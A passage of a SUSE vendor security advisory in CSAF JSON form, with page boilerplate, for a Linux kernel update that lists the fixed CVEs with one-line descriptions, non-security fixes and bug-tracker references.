To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise 16.0 and SL MIxro 6.2 kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-40147: blk-throttle: fix access race during throttle policy activation (bsc#1253344).\n- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).\n- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).\n- CVE-2025-40261: nvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).\n- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).\n- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).\n- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).\n- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).\n- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).\n- CVE-2025-68211: ksm: use range-walk function to jump over holes in scan_get_next_rmap_item (bsc#1255319).\n- CVE-2025-68218: nvme-multipath: fix lockdep WARN due to partition scan work (bsc#1255245).\n- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).\n- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).\n- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).\n- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).\n- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).\n- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).\n- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).\n- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).\n- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).\n- CVE-2025-68341: veth: reduce XDP no_direct return section to fix race (bsc#1255506).\n- CVE-2025-68348: block: fix memory leak in __blkdev_issue_zero_pages (bsc#1255694).\n- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).\n- CVE-2025-68356: gfs2: Prevent recursive memory reclaim (bsc#1255593).\n- CVE-2025-68359: btrfs: fix double free of qgroup record after failure to add delayed ref head (bsc#1255542).\n- CVE-2025-68360: wifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks (bsc#1255536).\n- CVE-2025-68361: erofs: limit the level of fs stacking for file-backed mounts (bsc#1255526).\n- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).\n- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).\n- CVE-2025-68368: md: init bioset in mddev_init (bsc#1255527).\n- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).\n- CVE-2025-68374: md: fix rcu protection in md_wakeup_thread (bsc#1255530).\n- CVE-2025-68376: coresight: ETR: Fix ETR buffer use-after-free issue (bsc#1255529).\n- CVE-2025-68379: RDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure (bsc#1255695).\n- CVE-2025-68735: drm/panthor: Prevent potential UAF in group creation (bsc#1255811).\n- CVE-2025-68741: scsi: qla2xxx: Fix improper freeing of purex item (bsc#1255703).\n- CVE-2025-68743: mshv: Fix create memory region overlap check (bsc#1255708).\n- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).\n- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).\n- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).\n- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).\n- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).\n- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).\n- CVE-2025-68784: xfs: fix a UAF problem in xattr repair (bsc#1256793).\n- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).\n- CVE-2025-68792: tpm2-sessions: Fix out of range indexing in name_size (bsc#1256656).\n- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).\n- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).\n- CVE-2025-68799: caif: fix integer underflow in cffrml_receive() (bsc#1256643).\n- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).\n- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).\n- CVE-2025-68803: NFSD: NFSv4 file creation neglects setting ACL (bsc#1256770).\n- CVE-2025-68811: svcrdma: use rc_pageoff for memcpy byte offset (bsc#1256677).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).\n- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).\n- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).\n- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).\n- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).\n- CVE-2025-68821: fuse: fix readahead reclaim deadlock (bsc#1256667).\n- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).\n- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).\n- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).\n- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).\n- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).\n- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).\n- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).\n- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).\n- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).\n- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).\n- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).\n- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).\n- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).\n- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).\n- CVE-2025-71126: mptcp: avoid deadlock on fallback while reinjecting (bsc#1256755).\n- CVE-2025-71132: smc91x: fix broken irq-context in PREEMPT_RT (bsc#1256737).\n- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).\n- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).\n- CVE-2025-71137: octeontx2-pf: fix \"UBSAN: shift-out-of-bounds error\" (bsc#1256760).\n- CVE-2025-71148: net/handshake: restore destructor on submit failure (bsc#1257159).\n- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).\n- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).\n- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).\n- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).\n- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).\n- CVE-2026-22981: idpf: detach and close netdevs while handling a reset (bsc#1257225).\n- CVE-2026-22982: net: mscc: ocelot: Fix crash when adding interface under a lag (bsc#1257179).\n- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).\n- CVE-2026-22986: gpiolib: fix race condition for gdev-\u003esrcu (bsc#1257276).\n- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).\n- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).\n- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).\n- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).\n- CVE-2026-22996: net/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv.\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).\n- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).\n\nThe following non security issues were fixed:\n\n- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).\n- Add bugnumber to an existing hv_netvsc change (bsc#1257473).\n- Fix locking issue introduced by a CVE backport (bsc#1256975 bsc#1254977).\n- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)\n- arm64: Update config files. Disable DEVPORT (bsc#1256792)\n- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).\n- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).\n- btrfs: pass fs_info to btrfs_delete_ref_head() (git-fixes).\n- btrfs: scrub: always update btrfs_scrub_progress::last_physical (git-fixes).\n- bus: fsl-mc: Constify fsl_mc_device_match() (jsc#PED-10906 git-fixes).\n- drm/imagination: Wait for FW trace update command completion (git-fixes).\n- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).\n- ice: use netif_get_num_default_rss_queues() (bsc#1247712).\n- libbpf: Fix -Wdiscarded-qualifiers under C23 (bsc#1257309).\n- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).\n- net: mana: Fix incorrect speed reported by debugfs (bsc#1255232).\n- net: mana: Support HW link state events (bsc#1253049).\n- nfsd: adjust WARN_ON_ONCE in revoke_delegation (bsc#1257015).\n- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).\n- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).\n- sched/fair: Disable scheduler feature NEXT_BUDDY (bsc#1255459).\n- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256864).\n- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256864).\n- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).\n- slimbus: core: Constify slim_eaddr_equal() (jsc#PED-10906 git-fixes).\n- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).\n- smb: client: update cfid-\u003elast_access_time in open_cached_dir_by_dentry() (git-fixes).\n- smb: improve directory cache reuse for readdir operations (bsc#1252712).\n- tsm-mr: Add TVM Measurement Register support (bsc#1257504).\n- tsm-mr: Add tsm-mr sample code (bsc#1257504).\n- virt: tdx-guest: Expose TDX MRs as sysfs attributes (bsc#1257504).\n- virt: tdx-guest: Refactor and streamline TDREPORT generation (bsc#1257504).\n- virt: tdx-guest: Transition to scoped_cond_guard for mutex operations (bsc#1257504).\n- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).\n- x86/tdx: Add tdx_mcall_extend_rtmr() interface (bsc#1257504).\n- x86/tdx: tdx_mcall_get_report0: Return -EBUSY on TDCALL_OPERAND_BUSY error (bsc#1257504).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLES-HA-16.0-325",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20615-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20615-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620615-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20615-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024605.html"
},
{
"category": "self",
"summary": "SUSE Bug 1205462",
"url": "https://bugzilla.suse.com/1205462"
},
{
"category": "self",
"summary": "SUSE Bug 1214285",
"url": "https://bugzilla.suse.com/1214285"
},
{
"category": "self",
"summary": "SUSE Bug 1215199",
"url": "https://bugzilla.suse.com/1215199"
},
{
"category": "self",
"summary": "SUSE Bug 1235905",
"url": "https://bugzilla.suse.com/1235905"
},
{
"category": "self",
"summary": "SUSE Bug 1242505",
"url": "https://bugzilla.suse.com/1242505"
},
{
"category": "self",
"summary": "SUSE Bug 1242974",
"url": "https://bugzilla.suse.com/1242974"
},
{
"category": "self",
"summary": "SUSE Bug 1242986",
"url": "https://bugzilla.suse.com/1242986"
},
{
"category": "self",
"summary": "SUSE Bug 1243452",
"url": "https://bugzilla.suse.com/1243452"
},
{
"category": "self",
"summary": "SUSE Bug 1243507",
"url": "https://bugzilla.suse.com/1243507"
},
{
"category": "self",
"summary": "SUSE Bug 1243662",
"url": "https://bugzilla.suse.com/1243662"
},
{
"category": "self",
"summary": "SUSE Bug 1246184",
"url": "https://bugzilla.suse.com/1246184"
},
{
"category": "self",
"summary": "SUSE Bug 1246282",
"url": "https://bugzilla.suse.com/1246282"
},
{
"category": "self",
"summary": "SUSE Bug 1247030",
"url": "https://bugzilla.suse.com/1247030"
},
{
"category": "self",
"summary": "SUSE Bug 1247292",
"url": "https://bugzilla.suse.com/1247292"
},
{
"category": "self",
"summary": "SUSE Bug 1247712",
"url": "https://bugzilla.suse.com/1247712"
},
{
"category": "self",
"summary": "SUSE Bug 1248166",
"url": "https://bugzilla.suse.com/1248166"
},
{
"category": "self",
"summary": "SUSE Bug 1248175",
"url": "https://bugzilla.suse.com/1248175"
},
{
"category": "self",
"summary": "SUSE Bug 1248178",
"url": "https://bugzilla.suse.com/1248178"
},
{
"category": "self",
"summary": "SUSE Bug 1248179",
"url": "https://bugzilla.suse.com/1248179"
},
{
"category": "self",
"summary": "SUSE Bug 1248185",
"url": "https://bugzilla.suse.com/1248185"
},
{
"category": "self",
"summary": "SUSE Bug 1248188",
"url": "https://bugzilla.suse.com/1248188"
},
{
"category": "self",
"summary": "SUSE Bug 1248196",
"url": "https://bugzilla.suse.com/1248196"
},
{
"category": "self",
"summary": "SUSE Bug 1248206",
"url": "https://bugzilla.suse.com/1248206"
},
{
"category": "self",
"summary": "SUSE Bug 1248208",
"url": "https://bugzilla.suse.com/1248208"
},
{
"category": "self",
"summary": "SUSE Bug 1248209",
"url": "https://bugzilla.suse.com/1248209"
},
{
"category": "self",
"summary": "SUSE Bug 1248211",
"url": "https://bugzilla.suse.com/1248211"
},
{
"category": "self",
"summary": "SUSE Bug 1248212",
"url": "https://bugzilla.suse.com/1248212"
},
{
"category": "self",
"summary": "SUSE Bug 1248213",
"url": "https://bugzilla.suse.com/1248213"
},
{
"category": "self",
"summary": "SUSE Bug 1248214",
"url": "https://bugzilla.suse.com/1248214"
},
{
"category": "self",
"summary": "SUSE Bug 1248216",
"url": "https://bugzilla.suse.com/1248216"
},
{
"category": "self",
"summary": "SUSE Bug 1248217",
"url": "https://bugzilla.suse.com/1248217"
},
{
"category": "self",
"summary": "SUSE Bug 1248222",
"url": "https://bugzilla.suse.com/1248222"
},
{
"category": "self",
"summary": "SUSE Bug 1248227",
"url": "https://bugzilla.suse.com/1248227"
},
{
"category": "self",
"summary": "SUSE Bug 1248228",
"url": "https://bugzilla.suse.com/1248228"
},
{
"category": "self",
"summary": "SUSE Bug 1248229",
"url": "https://bugzilla.suse.com/1248229"
},
{
"category": "self",
"summary": "SUSE Bug 1248232",
"url": "https://bugzilla.suse.com/1248232"
},
{
"category": "self",
"summary": "SUSE Bug 1248234",
"url": "https://bugzilla.suse.com/1248234"
},
{
"category": "self",
"summary": "SUSE Bug 1248240",
"url": "https://bugzilla.suse.com/1248240"
},
{
"category": "self",
"summary": "SUSE Bug 1248360",
"url": "https://bugzilla.suse.com/1248360"
},
{
"category": "self",
"summary": "SUSE Bug 1248366",
"url": "https://bugzilla.suse.com/1248366"
},
{
"category": "self",
"summary": "SUSE Bug 1248384",
"url": "https://bugzilla.suse.com/1248384"
},
{
"category": "self",
"summary": "SUSE Bug 1248626",
"url": "https://bugzilla.suse.com/1248626"
},
{
"category": "self",
"summary": "SUSE Bug 1249307",
"url": "https://bugzilla.suse.com/1249307"
},
{
"category": "self",
"summary": "SUSE Bug 1249609",
"url": "https://bugzilla.suse.com/1249609"
},
{
"category": "self",
"summary": "SUSE Bug 1249895",
"url": "https://bugzilla.suse.com/1249895"
},
{
"category": "self",
